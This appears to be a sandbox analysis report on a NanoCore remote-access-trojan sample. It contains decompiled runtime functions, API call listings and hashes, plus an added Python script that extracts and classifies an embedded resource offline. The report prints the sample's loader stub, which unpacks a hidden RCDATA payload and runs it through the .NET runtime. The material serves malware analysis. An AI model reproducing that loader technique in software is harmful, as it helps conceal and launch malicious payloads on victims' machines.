                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Library code (comment added in editing, not decompiler output): CRT locale
                			// teardown that frees the lconv / monetary strings and the six per-category
                			// entries of a locale block (see API ID ___free_lconv_mon). The comparisons
                			// against 0x412668 and 0x412658 skip the static default-locale tables so they
                			// are never freed; E00403E03 is free().
                			E00406472(intOrPtr _a4) {
                				intOrPtr _v8;
                				intOrPtr _t25;
                				intOrPtr* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t29;
                				intOrPtr* _t31;
                				intOrPtr* _t45;
                				intOrPtr* _t46;
                				intOrPtr* _t47;
                				intOrPtr* _t55;
                				intOrPtr* _t70;
                				intOrPtr _t74;
                
                				_t74 = _a4;
                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                				if(_t25 != 0 && _t25 != 0x412668) {
                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                					if(_t45 != 0 &&  *_t45 == 0) {
                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                						if(_t46 != 0 &&  *_t46 == 0) {
                							E00403E03(_t46);
                							E00405FEC( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                						if(_t47 != 0 &&  *_t47 == 0) {
                							E00403E03(_t47);
                							E004060EA( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						E00403E03( *((intOrPtr*)(_t74 + 0x7c)));
                						E00403E03( *((intOrPtr*)(_t74 + 0x88)));
                					}
                				}
                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                				if(_t26 != 0 &&  *_t26 == 0) {
                					E00403E03( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                					E00403E03( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                					E00403E03( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                					E00403E03( *((intOrPtr*)(_t74 + 0x8c)));
                				}
                				E004065E5( *((intOrPtr*)(_t74 + 0x9c)));
                				_t28 = 6;
                				_t55 = _t74 + 0xa0;
                				_v8 = _t28;
                				_t70 = _t74 + 0x28;
                				do {
                					if( *((intOrPtr*)(_t70 - 8)) != 0x412658) {
                						_t31 =  *_t70;
                						if(_t31 != 0 &&  *_t31 == 0) {
                							E00403E03(_t31);
                							E00403E03( *_t55);
                						}
                						_t28 = _v8;
                					}
                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                						_t29 =  *((intOrPtr*)(_t70 - 4));
                						if(_t29 != 0 &&  *_t29 == 0) {
                							E00403E03(_t29);
                						}
                						_t28 = _v8;
                					}
                					_t55 = _t55 + 4;
                					_t70 = _t70 + 0x10;
                					_t28 = _t28 - 1;
                					_v8 = _t28;
                				} while (_t28 != 0);
                				return E00403E03(_t74);
                			}
                0x0040647a
                0x0040647e
                0x00406486
                0x0040648f
                0x00406494
                0x0040649b
                0x004064a3
                0x004064ab
                0x004064b6
                0x004064bc
                0x004064bd
                0x004064c5
                0x004064cd
                0x004064d8
                0x004064de
                0x004064e2
                0x004064ed
                0x004064f3
                0x00406494
                0x004064f4
                0x004064fc
                0x0040650f
                0x00406522
                0x00406530
                0x0040653b
                0x00406540
                0x00406549
                0x00406551
                0x00406552
                0x00406558
                0x0040655b
                0x0040655e
                0x00406565
                0x00406567
                0x0040656b
                0x00406573
                0x0040657a
                0x00406580
                0x00406581
                0x00406581
                0x00406588
                0x0040658a
                0x0040658f
                0x00406597
                0x0040659c
                0x0040659d
                0x0040659d
                0x004065a0
                0x004065a3
                0x004065a6
                0x004065a9
                0x004065a9
                0x004065bb

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ___free_lconv_mon
                • String ID: X&A$h&A
                • API String ID: 3903695350-2460073903
                • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction ID: c022010335f5f63834756724e632691087aba38665b0d3053e0191f3bc5e7cad
                • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                • Instruction Fuzzy Hash: 78316E31600601AFDB209F39E845B577BE8AF00315F11457FE45AE66D1DF39EEA08B98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Library code (comment added in editing, not decompiler output): CRT start-up
                			// caching the ANSI and wide process command line (_acmdln / _wcmdln) at
                			// 0x412e78 and 0x412e7c.
                			E00405575() {
                
                				 *0x412e78 = GetCommandLineA();
                				 *0x412e7c = GetCommandLineW();
                				return 1;
                			}
                0x0040557b
                0x00405586
                0x0040558d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CommandLine
                • String ID: `3M
                • API String ID: 3253501508-1267747375
                • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                C-Code - Quality: 100%
                			// CRT start-up: installs E00401E29 as the process-wide unhandled-exception
                			// filter. The sandbox saw this call execute (see the API list below).
                			E00401E1D() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                				return _t1;
                			}

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Native loader stub. It pulls RCDATA resource #1 out of its own image and
                			// hands the raw bytes to L00401000, which (per the API list and the
                			// "v4.0.30319" string below) calls CLRCreateInstance from mscoree.dll, i.e.
                			// hosts the .NET 4 runtime in-process to run the embedded managed payload.
                			// Every path ends in ExitProcess(0), so nothing survives a failed lookup.
                			E00401489() {
                				void* _v8;
                				struct HRSRC__* _t4;
                				long _t10;
                				struct HRSRC__* _t12;
                				void* _t13;
                				void* _t16;
                
                				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed; lpName = MAKEINTRESOURCE(1), lpType = 0xa = RT_RCDATA
                				_t12 = _t4;
                				if(_t12 == 0) {
                					L6:
                					ExitProcess(0); // no such resource: exit quietly
                				}
                				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                				if(_t16 != 0) {
                					_v8 = LockResource(_t16); // pointer to the resource bytes
                					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                					_t13 = _v8;
                					if(_v8 != 0 && _t10 != 0) {
                						L00401000(_t13, _t10); // executed; (payload, size) -> CLR hosting routine
                					}
                				}
                				FreeResource(_t16);
                				goto L6; // ExitProcess(0) once the payload returns
                			}

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%
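
                The stub at 0x401489 is the security-relevant piece of this native layer: the sample's own PE carries the NanoCore assembly as an RT_RCDATA resource with ID 1, and the code above resolves it through FindResourceW/LoadResource/LockResource before handing the bytes to a CLR-hosting routine. The example below is added here and is not part of the Joe Sandbox report or of the sample; it reproduces that lookup offline in Python over a constructed .rsrc image (the resource layout, the RVA 0x3000 and the payload bytes are all made up for the example) and then checks whether what the stub would hand to the runtime is a PE with a non-empty CLR header, which is the quickest way to tell "native loader around a managed payload" from a plain native dropper.

```python
import struct

# Resource types and flags from the PE spec (winnt.h); everything else in this
# file is constructed example code, not the sample's data or the sandbox's parser.
RT_ICON = 3
RT_RCDATA = 10                      # the 0xa passed to FindResourceW at 0x40149F
IS_DIRECTORY = 0x80000000           # high bit of OffsetToData: entry points at a sub-directory


def _directory(entries):
    """Serialise an IMAGE_RESOURCE_DIRECTORY holding only integer-ID entries."""
    header = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, len(entries))
    return header + b"".join(struct.pack("<II", rid, off) for rid, off in entries)


def build_sample_rsrc(rsrc_rva, icon, rcdata):
    """Constructed .rsrc image: one RT_ICON and one RT_RCDATA resource, both ID 1.

    Offsets are hypothetical, chosen for this example: 0x00 root -> 0x20 icon type dir
    -> 0x38 icon name dir -> 0x50 icon data entry; 0x60 rcdata type dir -> 0x78 rcdata
    name dir -> 0x90 rcdata data entry; raw bytes from 0xA0. Language 0x409 (en-US).
    """
    blob = bytearray()
    blob += _directory([(RT_ICON, IS_DIRECTORY | 0x20), (RT_RCDATA, IS_DIRECTORY | 0x60)])
    blob += _directory([(1, IS_DIRECTORY | 0x38)])
    blob += _directory([(0x409, 0x50)])
    blob += struct.pack("<IIII", rsrc_rva + 0xA0, len(icon), 0, 0)
    blob += _directory([(1, IS_DIRECTORY | 0x78)])
    blob += _directory([(0x409, 0x90)])
    blob += struct.pack("<IIII", rsrc_rva + 0xA0 + len(icon), len(rcdata), 0, 0)
    assert len(blob) == 0xA0
    return bytes(blob + icon + rcdata)


def _entries(rsrc, dir_off):
    """Yield (Name/Id, OffsetToData) pairs of the directory at dir_off."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(n_named + n_id):
        yield struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)


def _lookup(rsrc, dir_off, wanted_id):
    """Return OffsetToData of the integer-ID entry `wanted_id`, or None."""
    for name, off in _entries(rsrc, dir_off):
        if name & 0x80000000:       # string-named entry; the loader asks for an integer ID
            continue
        if name == wanted_id:
            return off
    return None


def find_rcdata(rsrc, rsrc_rva, res_id):
    """Offline equivalent of FindResourceW(hModule, MAKEINTRESOURCE(res_id), RT_RCDATA)
    followed by LoadResource/LockResource/SizeofResource: walk type -> name -> language
    and return the resource bytes. Simplification: the first language entry is taken,
    whereas FindResourceW prefers the calling thread's locale."""
    type_off = _lookup(rsrc, 0, RT_RCDATA)
    if type_off is None or not type_off & IS_DIRECTORY:
        return None
    name_off = _lookup(rsrc, type_off & 0x7FFFFFFF, res_id)
    if name_off is None or not name_off & IS_DIRECTORY:
        return None
    languages = list(_entries(rsrc, name_off & 0x7FFFFFFF))
    if not languages or languages[0][1] & IS_DIRECTORY:
        return None
    data_rva, size, _codepage, _reserved = struct.unpack_from("<IIII", rsrc, languages[0][1])
    start = data_rva - rsrc_rva     # IMAGE_RESOURCE_DATA_ENTRY.OffsetToData is an RVA
    if start < 0 or start + size > len(rsrc):
        return None
    return rsrc[start:start + size]


def classify_payload(blob):
    """What did the stub hand to the CLR? A PE whose CLR runtime header (data
    directory 14) is non-empty is a managed assembly; anything else is not."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return "not a PE"
    pe = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[pe:pe + 4] != b"PE\0\0":
        return "not a PE"
    magic = struct.unpack_from("<H", blob, pe + 24)[0]            # optional header magic
    clr_dir = pe + 24 + (208 if magic == 0x10B else 224)         # PE32 vs PE32+ layout
    if clr_dir + 8 > len(blob):
        return "PE with truncated headers"
    rva, size = struct.unpack_from("<II", blob, clr_dir)
    return ".NET assembly" if rva and size else "native PE"


def build_fake_dotnet_pe():
    """Constructed stand-in for the embedded managed payload: a PE32 header shell whose
    CLR directory is non-empty. No code, no metadata, nothing from the real sample."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 206 + struct.pack("<II", 0x2008, 0x48) + b"\0" * 8
    return dos + b"PE\0\0" + file_header + optional


if __name__ == "__main__":
    rsrc = build_sample_rsrc(0x3000, b"ICON-BYTES", build_fake_dotnet_pe())
    payload = find_rcdata(rsrc, 0x3000, 1)
    print(len(payload), classify_payload(payload))
```

On the real sample the same two steps apply: dump RCDATA resource 1 from the file with any PE parser and run the CLR-header check on the result; if it reports a .NET assembly, the managed payload is what the NanoCore YARA and configuration hits in this report belong to, and that dropped or extracted assembly, not the native stub, is what to hand to a .NET decompiler.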

                APIs
                • GetCurrentProcess.KERNEL32 ref: 009EB730
                • GetCurrentThread.KERNEL32 ref: 009EB76D
                • GetCurrentProcess.KERNEL32 ref: 009EB7AA
                • GetCurrentThreadId.KERNEL32 ref: 009EB803
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 973efce7dd52f1da9740c83dcbe666a54dd7897319371b515d2b54ca30336996
                • Instruction ID: eac9c2251649c36b06caa161973941c5ac517ed28c73361cb3411077dea34c64
                • Opcode Fuzzy Hash: 973efce7dd52f1da9740c83dcbe666a54dd7897319371b515d2b54ca30336996
                • Instruction Fuzzy Hash: 735163B4E007888FDB11CFAAD5887DEBBF0AF88308F20846AE418A7790C7745945CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 009EB730
                • GetCurrentThread.KERNEL32 ref: 009EB76D
                • GetCurrentProcess.KERNEL32 ref: 009EB7AA
                • GetCurrentThreadId.KERNEL32 ref: 009EB803
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 05f122136028078a18ada102883b9fdcc6d3cf2462d660b3b7a5197d20a0462a
                • Instruction ID: df37f49c721fa0636f26b77532b98b0d4acbc0f8052b31602bd54416b9f3d565
                • Opcode Fuzzy Hash: 05f122136028078a18ada102883b9fdcc6d3cf2462d660b3b7a5197d20a0462a
                • Instruction Fuzzy Hash: 9E5142B0D007888FDB11CFAAD588BEEBBF4AF88308F208469E419B7750D7756945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// CRT start-up helper, not sample-specific logic: copies the wide-character
                			// environment block into a heap buffer. E0040558E appears to return a
                			// pointer to the end of the block (its distance from the start, halved,
                			// is the length in WCHARs; the decompiler doubled the expression to get
                			// bytes), E00403E3D allocates, E0040ACF0 copies.
                			E004055C5(void* __ecx) {
                				void* _t6;
                				int _t12;
                				void* _t14;
                				void* _t18;
                				WCHAR* _t19;
                
                				_t14 = __ecx;
                				_t19 = GetEnvironmentStringsW();
                				if(_t19 != 0) {
                					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1); // size of the block in bytes
                					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                					_t18 = _t6;
                					if(_t18 != 0) {
                						E0040ACF0(_t18, _t19, _t12); // copy into the new buffer
                					}
                					E00403E03(0);
                					FreeEnvironmentStringsW(_t19);
                				} else {
                					_t18 = 0;
                				}
                				return _t18;
                			}

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f861b8abf5cf6ad1710a1d74da6c6db3ecd2f41c9d8fd80d08a51993204641ba
                • Instruction ID: 060b9564e7293dcca6086be91a131662d6cb388dbbdbccb6fb0e9392b27b3555
                • Opcode Fuzzy Hash: f861b8abf5cf6ad1710a1d74da6c6db3ecd2f41c9d8fd80d08a51993204641ba
                • Instruction Fuzzy Hash: 9C22A374E00205CFEB14CF9AD598AEEB7B1FB4A340F258995D441AB364D734B882CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 009E962E
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 913aaada16f354ffbc9a017e5e647db521e02ce2d5890b433f805820282541fc
                • Instruction ID: 59318d256efe4454b4823660caaa55387cdd9e25458ade9049bbc8b928508172
                • Opcode Fuzzy Hash: 913aaada16f354ffbc9a017e5e647db521e02ce2d5890b433f805820282541fc
                • Instruction Fuzzy Hash: D0715670A00B458FD725CF6AC44179BB7F5BF88304F10892AE44ADBA50EB34E806CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009EFD0A
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 8196ea23c013385aa3475f26a689ae8249ece9bf1f30694eea32250d5cea493b
                • Instruction ID: 3239f36bfda1b02a3c1108949800f19bdec4ad5ae607e1cabba526447d21fa5f
                • Opcode Fuzzy Hash: 8196ea23c013385aa3475f26a689ae8249ece9bf1f30694eea32250d5cea493b
                • Instruction Fuzzy Hash: A951DFB1D002499FDF15CFAAC894ADEBBB5FF48314F24812AE819AB250D7749985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009EFD0A
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 23b627f9c3e315c9280ec224c8e0f53d77aa1f529cf9edf9e343badf5a3539e6
                • Instruction ID: fd048cdb8b4030b761e6a26fa74ac0f549fc9728ef166c0daca621bd708f76e9
                • Opcode Fuzzy Hash: 23b627f9c3e315c9280ec224c8e0f53d77aa1f529cf9edf9e343badf5a3539e6
                • Instruction Fuzzy Hash: 8C41BEB1D003489FDF15CFAAC894ADEBBB5BF48314F24812AE819AB250D7749985CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 04FB46B1
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: da129cf13438b087ec3a48f08a344cf353506a7df359467a9bb675e992cc8586
                • Instruction ID: 7b13065587390fdd035864adbbe5cf43b0cb26c57f501a2817c54f9690ec0849
                • Opcode Fuzzy Hash: da129cf13438b087ec3a48f08a344cf353506a7df359467a9bb675e992cc8586
                • Instruction Fuzzy Hash: F241E2B1C0465CCBDB24CFA9C984BCEBBB1BF49308F208069D449AB251E7756946CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 04FB46B1
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 9d3faeba91b676be272a449a6477b53793a16052a8ed6512dddc0d5cf3292337
                • Instruction ID: 691991f0dd8be73ec1c47e99bf5c70dfe2607be8608f2b851d3b2a66a4f6b845
                • Opcode Fuzzy Hash: 9d3faeba91b676be272a449a6477b53793a16052a8ed6512dddc0d5cf3292337
                • Instruction Fuzzy Hash: A541F2B1C0465CCBDB24CFAAC944BDEBBB6BF49308F208069D409BB251D7756946CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB2531
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: a0f816c0d83278f0a6be2c49690c68f4e570f6aada47a27e45a0961fa34fad84
                • Instruction ID: f6af0b01dc0563577d8da570a4fb5c8808509a118a4c761f751ce76930367bf9
                • Opcode Fuzzy Hash: a0f816c0d83278f0a6be2c49690c68f4e570f6aada47a27e45a0961fa34fad84
                • Instruction Fuzzy Hash: A1413AB4A00245CFCB14CF99C488AAEBBF5FF89314F25C499D459AB325D334A942CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 97735ac4564d6e32a3c3bf485810ba4c02a30f412274aeb07a6396cf186d602d
                • Instruction ID: 033f4334d2d629080487da683a2256b5b6fed6f60c46a6a5c4bcde0e9d0ace53
                • Opcode Fuzzy Hash: 97735ac4564d6e32a3c3bf485810ba4c02a30f412274aeb07a6396cf186d602d
                • Instruction Fuzzy Hash: DF319C74A28249CFDB15CFA9D848BEDBBF1BF49324F058059E815AB361C7749845CF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04FBB957
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 03f54f303c626c711296be041fd8d3a47cdc4ea20f4767b00c357df734c1ced7
                • Instruction ID: 6d1828cb11b48d238be4fcb43c4dd1671f702d8b2efb647af7d4ce3ebf8e3d33
                • Opcode Fuzzy Hash: 03f54f303c626c711296be041fd8d3a47cdc4ea20f4767b00c357df734c1ced7
                • Instruction Fuzzy Hash: 51318F71904388AFDB018FA9D800ADEBFF8EF0A314F14845AE594E7251C335E955DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009EBD87
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 9d4cece2912818b341c99acbd274838bc9a60c502de19a8b6797818384f9dd2d
                • Instruction ID: 80a09cd2024f7df1c7078a5ab9e2188b7bd87a78390e1ff47c36d30f839f190d
                • Opcode Fuzzy Hash: 9d4cece2912818b341c99acbd274838bc9a60c502de19a8b6797818384f9dd2d
                • Instruction Fuzzy Hash: 0B2100B5D002499FDB01CFA9D884ADEBBF5EF48314F14801AE958B7250C378AA45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009EBD87
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 9cb9b1d09490146afccc46db357b6ca82021f045464bf881eb22f0af9c3e6e6f
                • Instruction ID: c42b70d436a2b22ab575613787809af68b0e05027883ff849215b18281e3e271
                • Opcode Fuzzy Hash: 9cb9b1d09490146afccc46db357b6ca82021f045464bf881eb22f0af9c3e6e6f
                • Instruction Fuzzy Hash: AB21C4B59002489FDB11CFAAD884ADEFBF8EB48314F14841AE918B7350D378A954CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009E7F5D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: 474cdc9f9d9b6650175f1b7cea89ef39653e914656342f2545ac3433e4b105a4
                • Instruction ID: 7d415ee93eb30dd99459f1a45e42af8f901fcb5669a379d91fb5e0164457d9cb
                • Opcode Fuzzy Hash: 474cdc9f9d9b6650175f1b7cea89ef39653e914656342f2545ac3433e4b105a4
                • Instruction Fuzzy Hash: 7D21AF759087958FCB12DFA9D8453DEFFF8EF05314F08845AD498A7282C3789A45CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009E96A9,00000800,00000000,00000000), ref: 009E98BA
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: e4e989c59862191c69e642157806826e334fdeb2339ba07884abc2441be85235
                • Instruction ID: 5f31cb28f05d502c3407cd216a4a5dae24c3659c199324033a953ba7f87b1a31
                • Opcode Fuzzy Hash: e4e989c59862191c69e642157806826e334fdeb2339ba07884abc2441be85235
                • Instruction Fuzzy Hash: DA11F2B69002898FCB11CF9AC444ADEFBF8EB49310F10842AE529B7610C375A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009E96A9,00000800,00000000,00000000), ref: 009E98BA
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 85649fa39224e87f4331897b14cad9080f0bbb53d44ccd9bdfb7016801e7ab44
                • Instruction ID: f7a3683c85d712d5f95307ff9f6e1b69175213d3fa8d78f993e2292f8bf8c6bc
